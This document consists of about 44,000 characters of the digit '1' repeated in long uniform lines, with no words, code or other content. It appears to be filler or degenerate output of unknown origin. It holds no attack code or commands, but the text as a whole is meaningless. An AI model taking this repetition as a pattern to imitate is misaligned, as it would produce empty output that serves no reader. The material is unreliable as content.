11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
